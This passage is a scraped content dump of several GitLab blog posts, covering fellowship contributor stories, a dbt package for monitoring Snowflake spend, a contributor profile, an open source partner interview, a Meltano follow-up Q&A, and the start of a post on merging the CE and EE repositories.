Rushford](https://gitlab.com/jrushford). My primary responsibility was to improve both the developer and user experience on GitLab. \n\nMy favorite contribution was helping to update expand/collapse buttons in roadmaps [from link buttons to tertiary buttons](https://gitlab.com/gitlab-org/gitlab/-/issues/396775). Before the changes, the feature was using old components, and I updated it to new GitLab UI components. We had to [migrate the expand/collapse buttons](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/117242) that appear in the roadmap tree drawer. So we were working with the tree view (or, you could say, the 'child components' of the roadmap) and, because of this, it was very difficult for me to find the right file from GitLab's very large codebase.\n\nMaking this contribution taught me a lot about working with the GitLab codebase — specifically about making changes to the front-end user interface. I had to work with different GitLab components, such as the epic item details (vue component), epic item details (js component), and the front-end JavaScript libraries such as [Jest](https://jestjs.io/), in order to test or implement this feature.\n\nThis contribution also helped me develop my collaboration and communication skills. I had to work closely with other members of the GitLab community, including designers, product managers, and other contributors, in order to refine the feature and ensure that it aligned with GitLab's design principles and user experience goals.\n\nI also learned not to jump into coding without understanding an issue completely. Here, James helped me quite a bit: When I asked for his guidance, he responded with the following questions:\n\n- What is your understanding of the problem?\n- What did you try so far?\n- What did you find so far?\n- What are your next ideas?\n- Where did you look for information?\n\nAt first, I was confused. *Why is he asking me these questions instead of helping me?* But following James' technique really helped me with the issue, and I solved the problem by myself. At that moment, one of the most important lessons was clear to me: Don't underestimate myself. James wanted me to go beyond my limits, get out of the box, and try to solve the issue by myself so I could have a better understanding of what was happening in the codebase. So to anyone wishing to contribute to GitLab, I would say: Believe in yourself and give your best, and make sure you read the issue closely to develop a good understanding of the problem you're trying to solve.\n\n## Young Jun Joo\nDuring my Major League Hacking fellowship with GitLab, I worked on [improving the GitLab search function](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/111741). Some GitLab users were experiencing a slow search experience — and as a user myself, I understood the importance of having a quick and efficient search function. I wanted to help make that a reality for other users.\n\nSo I [implemented a memoization algorithm](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/112606) that caches search results. Now, if a user searches for the same word multiple times, the search results will be retrieved from the cache instead of being recalculated each time. This results in a faster and more efficient search experience for GitLab users.\n\nMy contribution to GitLab was significant because it improved the search function's performance and efficiency, making it more reliable and user-friendly. Working on this project taught me a lot about optimization and efficiency in software development. I also gained a deeper understanding of how memoization algorithms work and how they can be used to improve performance.\n\nMy work on this project not only was extremely rewarding but also had a positive impact on GitLab and its users, who can now quickly and easily search for the information they need without experiencing lag or delays. I'm proud to have made a meaningful contribution to such a valuable tool for software development, and grateful for the opportunity to have worked with such a talented team of developers.\n\n## Your turn\nWant to improve your open source development skill by contributing to GitLab? You can start right now by reviewing the project's [list of outstanding issues](https://gitlab.com/groups/gitlab-org/-/issues/?sort=created_date&state=opened&label_name%5B%5D=quick%20win&first_page_size=100) (hint: start with issues labeled `quick win`). And be sure to connect with our [community on Discord](https://discord.gg/gitlab). We'd love to meet you.\n",[9,267,1099],{"slug":3738,"featured":6,"template":689},"major-league-gitlab-hacking","content:en-us:blog:major-league-gitlab-hacking.yml","Major League Gitlab Hacking","en-us/blog/major-league-gitlab-hacking.yml","en-us/blog/major-league-gitlab-hacking",{"_path":3744,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3745,"content":3751,"config":3758,"_id":3760,"_type":14,"title":3761,"_source":16,"_file":3762,"_stem":3763,"_extension":19},"/en-us/blog/managing-your-snowflake-spend-with-periscope-and-dbt",{"title":3746,"description":3747,"ogTitle":3746,"ogDescription":3747,"noIndex":6,"ogImage":3748,"ogUrl":3749,"ogSiteName":673,"ogType":674,"canonicalUrls":3749,"schema":3750},"How to manage your Snowflake spend with Periscope and dbt","The GitLab data team is open sourcing the dbt package they use to manage their Snowflake spend.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749670255/Blog/Hero%20Images/data-servers.jpg","https://about.gitlab.com/blog/managing-your-snowflake-spend-with-periscope-and-dbt","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How to manage your Snowflake spend with Periscope and dbt\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Taylor Murphy\"},{\"@type\":\"Person\",\"name\":\"Emilie Schario\"}],\n        \"datePublished\": \"2019-08-26\",\n      }",{"title":3746,"description":3747,"authors":3752,"heroImage":3748,"date":3755,"body":3756,"category":10,"tags":3757},[3753,3754],"Taylor Murphy","Emilie Schario","2019-08-26","\nOn the data team at GitLab, we are grateful to be empowered with best in-class tools that enable us to produce high-quality work. At the 2018 DataEngConf (now Data Council), GitLab data engineer [Thomas La Piana](/company/team/#tlapiana) spoke about how a team of three was supporting the data needs of a billion-dollar company. As he explains in this talk, we focus a lot on processes and workflows.\n\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube.com/embed/eu623QBwakc\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\n## Where are the existing gaps?\nToday, the data team has grown from three to seven: three engineers and four analysts.\nSince we've more than doubled in the last six months, we've had to take a step back and revisit our processes.\n\n![GitLab Team Headcount](https://about.gitlab.com/images/blogimages/team_headcount.png){: .shadow.medium.center}\nThe GitLab team has grown significantly in the past few months.\n{: .note.text-center}\n\n### GitLab is growing fast\n\nDespite the significant jump in the data team's headcount, our growth has not matched the exponential growth of the team supporting GitLab.\nAs GitLab grows, more folks aim to include more data in their decision-making process.\nThis means we're iterating quickly, collecting feedback, and constantly improving on the quality of the analyses we are producing for our business stakeholders.\nThe demand for more data means there is a lot more to accomplish – making now an opportune time to review our processes and improve the data team's impact across GitLab.\n\nFor example, a data team member pointed out that refinement isn't a part of our [milestone planning process](/handbook/business-technology/data-team/how-we-work/#milestone-planning).\nNo wonder our backlog wasn't moving anywhere! We identified the root of the problem by asking our team, \"What is the problem we're trying to solve?\" and then laid out a plan to address it.\n\n### Onboarding can be hard\n\nWe've made some great data analyst hires recently!\nWe don't require our new team members to be familiar with our existing data stack (Stitch/Singer - Snowflake - dbt - Periscope), but we do require them to have technical skills that match their role.\nThis usually includes Git, SQL, and Python (Pandas) at the bare minimum, though we welcome R (tidyverse) as well.\nWhile onboarding at any company can be difficult, it's especially challenging in an all-remote organization such as GitLab.\n\nIn addition to introducing candidates to our specific technologies, part of the [data analyst onboarding](https://gitlab.com/gitlab-data/analytics/blob/master/.gitlab/issue_templates/data_onboarding.md) includes a unit on resource consumption.\nWe spend time introducing the concepts of databases and warehouses in Snowflake, because storage and compute being separate are often novel ideas to folks joining GitLab from an on-premise data organization.\nIn some cases, we are teaching our new hires a new way to think about the data-related problems they're solving, and introducing different resources to remedy these problems.\n\n### With great power comes great responsibility\n\nWe consume more resources as the data team headcount grows. I think about this like folks using water in a household. If everyone is on vacation, the water bill will be low, but if all the cousins come visit for a week, the bill will be high.\nSimilarly to why we encourage a big group of visiting relatives to take shorter showers to conserve water, on the data team we work to steward resources effectively. This means we must identify wasted resources to recapture them.\nIt's important that our operating expenses not balloon with headcount.\n\n## Are you protected against a leak?\n\nAs a homeowner, I can share a myriad of appliance-gone-wrong stories, but one tops them all: the time there was a leak in our front yard that we only discovered because of a $1,000 water bill.\nOften, homeowners can only measure water usage when the bill arrives, when it's always too late to fix it.\n\nLucky for our team and yours, Snowflake is much more generous than my water company.\nWe *can* monitor our costs as it accrues.\nAfter having this process in place for a bit now, we'd encourage you to implement it in your stack.\n\n## Monitor your Snowflake spend with dbt and Periscope\n\nWe're excited to make our [Snowflake spend dbt package](https://gitlab.com/gitlab-data/snowflake_spend) widely available for use.\nDoing this is in line with our belief in the value of [open source analytics](/blog/open-source-analytics/).\n\nTo get started, you'll need to grant access to the `snowflake` database to your dbt-specific role with:\n```\nGRANT IMPORTED PRIVILEGES ON DATABASE snowflake TO ROLE \u003Crole>;\n```\n\nThen you'll need to update the `packages.yml` file in your dbt project to include the following:\n```\npackages:\n  - git: https://gitlab.com/gitlab-data/snowflake_spend.git\n    revision: v1.0.0\n```\n\nToday, you can only install the package directly from Git.\nSince it doesn't depend on any other packages, you don't have to worry about version management, so this should not cause any problems.\nYou can run `dbt deps` to ensure the package is installed correctly.\n\nYou will need a csv called `snowflake_contract_rates.csv` which has two columns: effective date and rate. The effective date is the day the new contracted rate started and it should be in YYYY-MM-DD format. The rate is the per credit price for the given time period. You can see how the data team configures [their csv file](https://gitlab.com/gitlab-data/analytics/blob/master/transform/snowflake-dbt/data/snowflake_contract_rates.csv). You will need to run `dbt seed` for the csv to be loaded as a table and for the model to run succesfully.\n\nFinally, you will need to update your `dbt_project.yml` file to enable this package with the following block.\n```\nmodels:\n  snowflake_spend:\n    enabled: true\n```\nYou can see [how the data team has configured the package](https://gitlab.com/gitlab-data/analytics/blob/master/transform/snowflake-dbt/dbt_project.yml#L68) in our `dbt_project.yml` file.\n\nRunning `dbt compile` will not only test that you've configured all of this correctly, but also will compile the files in the `analysis` directory. These are the queries that we use to underlie the exact Periscope dashboard that we have automatically posted in Slack every day.\n\n![GitLab's Periscope dashboard for managing Snowflake spend](https://about.gitlab.com/images/blogimages/periscope_snowflake_spend1.png){: .shadow.medium.center}\n![GitLab's Periscope dashboard for managing Snowflake spend](https://about.gitlab.com/images/blogimages/periscope_snowflake_spend2.png){: .shadow.medium.center}\n\nOnce you've set up this dashboard, you can configure it to auto-refresh daily.\nThen use Slack's `/remind app.periscopedata.com/dashboardurl` to have it regularly publish in the channel of your choice.\n\nYou can see how our resource management initiatives have been effective.\nWe hope you'll find monitoring a key step to helping manage your own Snowflake spend.\n\nHave any thoughts, questions, or suggestions? [Create an issue](https://gitlab.com/gitlab-data/snowflake_spend/issues).\n\nPhoto by [Taylor Vick](https://unsplash.com/photos/M5tzZtFCOfs) on [Unsplash](https://unsplash.com/)\n{: .note}\n",[779,267,9,1721],{"slug":3759,"featured":6,"template":689},"managing-your-snowflake-spend-with-periscope-and-dbt","content:en-us:blog:managing-your-snowflake-spend-with-periscope-and-dbt.yml","Managing Your Snowflake Spend With Periscope And Dbt","en-us/blog/managing-your-snowflake-spend-with-periscope-and-dbt.yml","en-us/blog/managing-your-snowflake-spend-with-periscope-and-dbt",{"_path":3765,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3766,"content":3771,"config":3775,"_id":3777,"_type":14,"title":3778,"_source":16,"_file":3779,"_stem":3780,"_extension":19},"/en-us/blog/marcel-amirault-contributor-post",{"title":3767,"description":3768,"ogTitle":3767,"ogDescription":3768,"noIndex":6,"ogImage":1192,"ogUrl":3769,"ogSiteName":673,"ogType":674,"canonicalUrls":3769,"schema":3770},"GitLab Code Contributor: Marcel Amirault","Recent MVP Marcel Amirault shares why he started contributing to GitLab.","https://about.gitlab.com/blog/marcel-amirault-contributor-post","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"GitLab Code Contributor: Marcel Amirault\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Ray Paik\"}],\n        \"datePublished\": \"2019-04-12\",\n      }",{"title":3767,"description":3768,"authors":3772,"heroImage":1192,"date":2408,"body":3773,"category":10,"tags":3774},[704],"\n\nI'm excited to continue the [series of GitLab contributor blog posts](/blog/tags.html#contributors)\nwith [Marcel Amirault](https://gitlab.com/Ravlen), [the MVP for the 11.9 release](/community/mvp/).\nLet's get to know more about him!\n\n### Can you tell us where you live and share anything interesting about your area?\n\nI'm originally from Halifax, in eastern Canada, but I now live in [Kagoshima, Japan](https://www.google.com/maps/place/Kagoshima,+Japan/@31.523208,130.2782569,10z/data=!3m1!4b1!4m5!3m4!1s0x353e615200e3c53d:0x9adcfdad5d5c5885!8m2!3d31.5968539!4d130.5571392) (and yes, I have seen wild tanuki!).\nKagoshima is famous for being right next to one of the world's most active volcanos, Sakurajima,\nwhich regularly dusts the city in ash. You have to keep an eye on the wind before you decide\nto put out your laundry, or else you'll have some ashy-grey clothes pretty quickly.\nIt's also known for inspiring some famous movies. Hometown hero Saigō Takamori and the\nlocal Satsuma clan were the inspirations for \"The Last Samurai,\" and Yakushima Island was\nthe inspiration for the forest in \"Princess Mononoke.\"\n\n![Picture of Sakurajima](https://about.gitlab.com/images/blogimages/Marcel-blogpost/kagoshima.png){: .shadow.small.center}\n*\u003Ccenter>\u003Csmall>Sakurajima in the distance\u003C/small>\u003C/center>*\n\n### Can you tell us what you do professionally?\n\nOriginally, I worked in IT Support, peaking as a Network Technician at a telecom company\nin eastern Canada. I loved the job, but I wanted to live abroad for a while before settling into my career.\nI decided to teach English in Japan \"for six months,\" but fell in love with the country and have\nbeen here ever since. I currently teach English as a second language to Japanese students, and\nhave taught all ages and types of students over the years. I write, proofread, and teach curricula\nfor various types of students, ranging from people preparing for their first trip abroad, to seminars\nin hospitals for medical professionals. From time to time I proofread documents brought to me,\nsuch as applications to international programs, or scientific papers being prepared for submission for peer review.\n\n![Marcel in the classroom](https://about.gitlab.com/images/blogimages/Marcel-blogpost/marcel-teaching.jpg){: .shadow.small.center}\n\n### When did you first contribute to GitLab and why did you decide to contribute?\n\nAbout a year ago, I started a Rails course to try to get back into the IT world, and needed to\nchoose a place to store my Git repo. A friend suggested GitLab, and I dove right in.\nWhile reading the documentation, I sometimes found small mistakes that the English teacher\nin me couldn't ignore, so I started submitting MRs for small things like typos or obvious grammar mistakes.\nIn fact, [my first MR](https://gitlab.com/gitlab-com/www-gitlab-com/merge_requests/11848) was to correct grammar.\nFrom there, the MRs got a little bigger, and a little more involved, and it's something I enjoy doing when things are slow at work.\n\n### What was the most difficult part of contributing for you in the beginning?\n\nThere was no significant hurdle to starting, because contributing to documentation was not\nintimidating at all, and I never had to worry about complicated reviews.\nWhen I first submitted a small change to the language in a section of the UI though, I suddenly\nhad a lot of reviews and suggestions, and started to realize how a small change could have a large impact.\nUnderstanding the impact that one person could have on a major project was something I had to learn.\nThankfully, a lot of GitLab team-members offered help and explained things for me, which I really appreciated.\n\n### Which areas of GitLab have you contributed to most and how do you find issues that you want to work on?\n\nUpdating technical documentation was a natural fit for me. I enjoy learning, so I frequently\nread the GitLab documentation, but my \"English teacher eyes\" can't ignore language that can be improved.\nI take advantage of free time at work, and I'm fortunate to have free access to computers and\na flexible boss (as long as my lesson quality is maintained). As a result, I'm often able to fill\nthe gaps between lessons by working on documentation issues. When I'm struggling to stay\nawake because my kids kept me up at night and I have a gap in my schedule, working on an\ninteresting bit of documentation wakes me up as much as a strong cup of coffee!\nI usually find documentation that can be improved on my own as I read through, but I\nsometimes search for [`Accepting Merge Requests` issues for Documentation](https://gitlab.com/gitlab-org/gitlab-ce/issues?scope=all&utf8=%E2%9C%93&state=opened&label_name[]=Accepting%20merge%20requests&label_name[]=Documentation) if I need a new project to work on. Recently I have given myself \"challenges,\"\nlike \"Find ALL examples of a certain grammar mistake project wide, and fix them\" or\n\"Find ALL examples where CE and EE documentation have diverged accidentally, and realign them when possible.\"\n\n### What do you enjoy doing when you're not working?\n\nI like doing home improvements when I can, and really like outdoor carpentry like putting up\nfences or wooden decks. I'm a big fan of hiking and camping, but it has been hard to get out\nto camping places in the past few years as my kids are still young. We are hoping to bring them\non their second ever camping trip this spring/summer. Finally, my friends and I try to get together\nabout once every month or two for poker or board gaming. Some of my favorite games are\nSettlers of Catan, Carcassonne, Puerto Rico, Pandemic, San Juan, and Guillotine.\n\n![Marcel and his children](https://about.gitlab.com/images/blogimages/Marcel-blogpost/marcel-family.png){: .shadow.small.center}\n\n### What advice do you have for others who may be interested in contributing to GitLab?\n\nDon't be shy! If you are worried about your contribution, feel free to make your MR a [draft](https://docs.gitlab.com/ee/user/project/merge_requests/drafts.html)\n(document last updated by me! 😉), and ask for help. Everyone is super friendly and always willing to give advice!\n\n### Interested in learning how you can contribute?\n\nA good place to start is the [Contributing to GitLab page](/community/contribute/), where you can learn\nhow you can contribute to GitLab code, documentation, translation, and UX design.\n\nIf you have any questions, you are always welcome to reach me at rpaik@gitlab.com.\n\n_Note: This post is part of [a series featuring people who contribute to GitLab](/blog/tags.html#contributors)._\n",[267,779,9,708],{"slug":3776,"featured":6,"template":689},"marcel-amirault-contributor-post","content:en-us:blog:marcel-amirault-contributor-post.yml","Marcel Amirault Contributor Post","en-us/blog/marcel-amirault-contributor-post.yml","en-us/blog/marcel-amirault-contributor-post",{"_path":3782,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3783,"content":3789,"config":3794,"_id":3796,"_type":14,"title":3797,"_source":16,"_file":3798,"_stem":3799,"_extension":19},"/en-us/blog/meet-partner-the-good-docs-project",{"title":3784,"description":3785,"ogTitle":3784,"ogDescription":3785,"noIndex":6,"ogImage":3786,"ogUrl":3787,"ogSiteName":673,"ogType":674,"canonicalUrls":3787,"schema":3788},"How The Good Docs Project uses GitLab for documentation as code and more","In this video interview, meet our new Open Source Partner, The Good Docs Project, and learn about the benefits they are extracting from the DevSecOps platform.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749682841/Blog/Hero%20Images/documentation1.jpg","https://about.gitlab.com/blog/meet-partner-the-good-docs-project","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How The Good Docs Project uses GitLab for documentation as code and more\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Bryan Behrenshausen\"}],\n        \"datePublished\": \"2023-07-06\",\n      }",{"title":3784,"description":3785,"authors":3790,"heroImage":3786,"date":3791,"body":3792,"category":10,"tags":3793},[2909],"2023-07-06","\n\n[The Good Docs Project](https://thegooddocsproject.dev/welcome/) wants to help improve software documentation across the entire [open source](https://go.gitlab.com/spHNym) ecosystem. The community provides templates and other resources to help open source developers write, maintain, and improve project documentation. Last year, they voted to migrate to GitLab. Since then, they've discovered how using an all-in-one DevSecOps platform can streamline and accelerate work in open source communities like theirs.\n\nThey've now joined the [GitLab Open Source Partners](https://go.gitlab.com/030Ue3) community, and they're sharing their knowledge and resources with other open source projects also using GitLab to build a world where anyone can contribute.\n\nI sat down with some community members from The Good Docs Project to learn what brought them together, what motivates their work, and where they're headed next.\n\nIn this interview, you'll learn:\n* How switching to GitLab enabled an open source project to unify planning, development, and testing work onto a single platform\n* How a community of technical writers and editors uses GitLab to develop documentation as code\n* How an open source project built community-focused git toolchain training on GitLab\n\n### Watch the interview\n\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube.com/embed/Bek7vLmNmME\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n\n## Learn more\n\nThe [GitLab Open Source Partners](https://go.gitlab.com/030Ue3) are building the future of open source on GitLab. Connect with them on [Gitlab.com](https://gitlab.com/gitlab-com/marketing/community-relations/open-source-program/gitlab-open-source-partners).\n\nCover image by \u003Ca href=\"https://unsplash.com/@beatriz_perez?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText\">Beatriz Pérez Moya\u003C/a> on \u003Ca href=\"https://unsplash.com/photos/XN4T2PVUUgk?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText\">Unsplash\u003C/a>  \n{: .note}\n",[9,267,1099],{"slug":3795,"featured":6,"template":689},"meet-partner-the-good-docs-project","content:en-us:blog:meet-partner-the-good-docs-project.yml","Meet Partner The Good Docs Project","en-us/blog/meet-partner-the-good-docs-project.yml","en-us/blog/meet-partner-the-good-docs-project",{"_path":3801,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3802,"content":3808,"config":3814,"_id":3816,"_type":14,"title":3817,"_source":16,"_file":3818,"_stem":3819,"_extension":19},"/en-us/blog/meltano-follow-up",{"title":3803,"description":3804,"ogTitle":3803,"ogDescription":3804,"noIndex":6,"ogImage":3805,"ogUrl":3806,"ogSiteName":673,"ogType":674,"canonicalUrls":3806,"schema":3807},"Thanks for all the feedback and interest in Meltano!","Last week we introduced Meltano, and we're so excited to be building our community and working with you on our MVP.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749678909/Blog/Hero%20Images/thanks-for-all-the-feedback-and-interest-in-meltano.jpg","https://about.gitlab.com/blog/meltano-follow-up","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Thanks for all the feedback and interest in Meltano!\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Jacob Schatz\"}],\n        \"datePublished\": \"2018-08-07\",\n      }",{"title":3803,"description":3804,"authors":3809,"heroImage":3805,"date":3811,"body":3812,"category":299,"tags":3813},[3810],"Jacob Schatz","2018-08-07","\nWe recently wrote a [post introducing Meltano](/blog/hey-data-teams-we-are-working-on-a-tool-just-for-you/), an open source tool that will help data teams version control everything from raw data to visualization. We were blown away by the level of interest it received, including all sorts of comments on [Hacker News](https://news.ycombinator.com/item?id=17667399) that gave us a ton of feedback we’re excited to wrestle with and work towards. Special thanks to commenter [slap_shot](https://news.ycombinator.com/item?id=17668089), whose comments prompted us to hop on YouTube for a live conversation. We learned that in real life, slap_shot is a data and analytics engineer and founder named Brett, and you can watch our live chat here:\n\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube.com/embed/F8tEDq3K_pE\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n\nBrett told us something we suspected after our own experience of assembling our analytics stack – that pretty much every data team he encounters is using a \"multitude of internal processes that are broken and cobbled together for data integration, or they're not comfortable with the pricing and sales process for some of these products.\"\n\nWhen we started researching tools for our team, the goal was to use only open source. Unfortunately, the best open source that we could find wasn't up to the task for us, and changing the code proved cumbersome due to licensing issues. We settled on Looker, a fantastic (but proprietary) solution for visualization, and began reluctantly building out other parts ourselves. Brett told us the idea of an open source version of Looker could be really promising – it's too expensive for many teams, including, to some extent, our own. We think it doesn't make sense to build a dashboard and not be able to share it with the whole team.\n\nSid shares, \"We spent months assembling our data pipeline... but all these choices were so hard, and I think there's room for a convention over configuration framework, where you type in your Salesforce API keys and you get the proper Salesforce graphs. We want to get as close as possible to that experience.\"\n\n### Issues and next steps\n\n*  The Meltano team is building a set of very common core extractors, including Salesforce, Marketo, Zendesk, etc. This way we can hopefully provide a few of the most important sources out of the box, and substantial initial value. Then, being an open source product, we hope others can contribute and increase the breadth of support.\n*  The data team is going to try to apply Meltano to a machine learning project, probably around predicting probability of winning a sales opportunity, so we can incorporate any requirements specific to ML.\n\n### Q&A\n\n#### Give me the short and sweet version – what does Meltano do?\n\n[Meltano helps](https://gitlab.com/meltano/meltano/#roadmap) companies consolidate, organize, and analyze their data to make better business decisions.\n\n#### Can the BI tool and integration library be used outside of GitLab?\n\nWe're not sure yet. For now, the integration part (which we call orchestration) is GitLab CI-based. We recently had the idea to have a frontend \"production mode,\" where you can at least see everything, and maybe we'll have a \"development mode\" where you can run different pipelines inside a Python Flask app.\n\n#### Embulk and Singer built the core foundation and they allow people to build their own integrations, do we envision similar model?\n\nYes. Right now we are prioritizing getting the architecture and tooling correct, to make it easy for us and others to build additional extractors.\n\n#### What's the vision for the monorepo and what are the benefits?\n\nWe consolidated all of the code for Meltano in a single project, to make it easier to develop and contribute to. We then provide two Meltano Docker images, similar to Jupyter notebook layering: a standard image which contains all of the default extractors and loaders, as well as a base image so users can customize it to contain only what they need. `meltano/analytics` is both a prototypical Meltano implementation and the repo for GitLab Analytics.\n\n#### Would I *have* to use Meltano for everything?\n\nNo! We know teams have different needs and preferences, so you would be able to pick and choose the features that you use.\n\n#### I'd like to see GitLab CI have a clean API for others to plug into. Do you see that happening?\n\nThe Data team is committed to using GitLab CI as our orchestration platform. [Airflow](https://airflow.apache.org/) is state of the art right now, but we think we can have similar or better features within CI. If appropriate, the Meltano team will contribute back to CI to make it better too. Some features we're excited about would be better statistics across jobs, sub-pipelines and directed acyclic graphs of jobs, and intelligent data backfill support.\n\n#### This sounds really ambitious, and there are a lot of companies in the data integration space.\n\nYou're completely right! But there isn't an open source tool that checks all these boxes. It might sound a bit ludicrous, but as Sid says, \"When I saw GitLab for the first time, it made sense that something you collaborate on is also something you contribute to... it makes sense to me that it's not an individual burden, it's a shared burden.\" We think that the shared nature of the problem will make for a great open source community, and without that community, this won't really get off the ground.\n\nPhoto by [Ludovic Toinel](https://unsplash.com/photos/nGwyaWKFRVI) on [Unsplash](https://unsplash.com/)\n{: .note}\n",[803,9],{"slug":3815,"featured":6,"template":689},"meltano-follow-up","content:en-us:blog:meltano-follow-up.yml","Meltano Follow Up","en-us/blog/meltano-follow-up.yml","en-us/blog/meltano-follow-up",{"_path":3821,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3822,"content":3827,"config":3833,"_id":3835,"_type":14,"title":3836,"_source":16,"_file":3837,"_stem":3838,"_extension":19},"/en-us/blog/merging-ce-and-ee-codebases",{"title":3823,"description":3824,"ogTitle":3823,"ogDescription":3824,"noIndex":6,"ogImage":792,"ogUrl":3825,"ogSiteName":673,"ogType":674,"canonicalUrls":3825,"schema":3826},"GitLab might move to a single Rails codebase","We're considering moving towards a single Rails repository by combining the two existing repositories – here's why, and what would change.","https://about.gitlab.com/blog/merging-ce-and-ee-codebases","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"GitLab might move to a single Rails codebase\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Marin Jankovski\"}],\n        \"datePublished\": \"2019-02-21\",\n      }",{"title":3823,"description":3824,"authors":3828,"heroImage":792,"date":3830,"body":3831,"category":801,"tags":3832},[3829],"Marin Jankovski","2019-02-21","\n\n## A single repository with no license changes\n\nBefore we go into the details of the proposed changes, we want to stress that:\n\n* GitLab Community Edition code would remain open source and MIT licensed.\n* GitLab Enterprise Edition code would remain source available and proprietary.\n\n## What are the challenges with having two repositories?\n\nCurrently the Ruby on Rails code of GitLab (the majority of the codebase) are maintained in two repositories.\nThe [gitlab-ce] repository for the code with an open source license and the [gitlab-ee] repository containing code with a proprietary license which is source available.\n\nFeature development is difficult and error prone when making any change at GitLab in two similar yet separate repositories that depend on one another.\n\nBelow are a few examples to demonstrate the problem:\n\n### Duplicated work during feature development\n\nThis [frontend only Merge Request](https://gitlab.com/gitlab-org/gitlab-ee/merge_requests/7376) required a [backport to CE repository](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests/22158). Backporting included creating duplicate work to avoid future conflicts as well as changes to the code to support the feature.\n\n### A simple change can break master\n\nA simple [change in a spec in CE repository](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests/24801)\nfailed the [pipeline in the master branch](https://gitlab.com/gitlab-org/gitlab-ee/issues/9621). After hours of investigation, an [MR reverting the change](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests/24961) was created, as well as a [second to address the problem](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests/24983).\n\n### Conflicts during preparation for regular releases\n\n This concerns preparation for a regular release, e.g. [11.7.5 release](https://gitlab.com/gitlab-org/release/tasks/issues/659). Merge requests preparing the release for both the [CE repository](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests/24941) and [EE repository](https://gitlab.com/gitlab-org/gitlab-ee/merge_requests/9441) need to be created and once the pipelines pass, the EE repository requires a merge from the CE repository. This causes additional conflicts, pipeline failures, and similar delays requiring more manual intervention during which the CE distribution release is also delayed.\n\nBetween these three examples, _days_ of engineering time has been spent on [busy work], delaying the delivery of work that brings actual value. Only three examples are highlighted, but this type of work occurs daily.\nWhether writing a new feature available in Core, or any of the enterprise plans, all are equally affected.\n\nMore details on the workflows and challenges can be found in the [working in CE and EE codebases blueprint] document.\n\n## What have we done to improve the situation?\n\nWe've invested significant development time to try and keep the two repositories separate:\n\n### Pre-2016: Manual merges for each release\n\n Prior to 2016, merging the CE repository into the EE repository was done when we were ready to cut a release; the number of commits was small so this could be done by one person.\n\n### 2016-2017: Daily merges by a team of developers\n\nIn 2016, the number of commits between the two repositories grew so the task was divided between seven (brave) developers responsible for merging the code once a day. This worked for a while until delays started happening due to failed specs or difficult merge conflicts.\n\n### 2017-2018: Automated merges every three hours\n\nAt the end of 2017, we merged an [MR that allowed the creation of automated MRs between the two repositories](https://gitlab.com/gitlab-org/release-tools/merge_requests/86), mentioning individuals to resolve conflicts. This task ran every three hours, allowing for a smaller number of commits to be worked on. You can read more about our [automated CE to EE merge here](/blog/using-gitlab-ci-to-build-gitlab-faster/).\n\n### Present: Further automation with Merge Train\n\nBy the end of 2018, the number of changes going into both the CE and EE repositories grew to thousands of commits in some cases, which made the automated MR insufficient. The [Merge Train](https://gitlab.com/gitlab-org/merge-train) tool was created to automate these workflows further, by automatically rejecting merge conflicts and preferring changes from one repository over the other. The edge cases we've encountered are requiring us to invest additional time in improving the custom tool.\n\nThis last attempt turned out to be a bit of a crossroads. Do we invest more development time in improving the custom tooling, knowing that we will never get it 100 percent right, or do we need to take some more drastic measures that are going to save countless hours of development time?\n\n## What are we proposing?\n\nOne of GitLab's core [values] is efficiency. As previously mentioned, merging the [gitlab-ce] Rails repository into the [gitlab-ee] Rails repository is proving to be inefficient.\n\nThe Rails repository is one of many base repositories of which GitLab consists. The [gitlab-ce] repository is a part of a [gitlab-ce distribution] package which offers only the Core [feature set]. Similarly, the [gitlab-ee] repository is part of a [gitlab-ee distribution] package which has a larger feature set available. See the image below:\n\n![CE-EE-Before](https://about.gitlab.com/images/blogimages/merging-ce-and-ee-codebases/community-enterprise-before.png){: .medium.center}\n\nThe change we are proposing would merge the [gitlab-ce] and [gitlab-ee] repositories into a single [gitlab] repository. This change is reflected below:\n\n![CE-EE-After](https://about.gitlab.com/images/blogimages/merging-ce-and-ee-codebases/community-enterprise-after.png){: .medium.center}\n\nThe [design for merging two codebases] outlines the required work and process changes in detail. The proposed change would pertain only to the Ruby on Rails repository, and I've summarized it below.\n\n### So, what changes?\n\n* The [gitlab-ce] and [gitlab-ee] repositories are replaced with a single 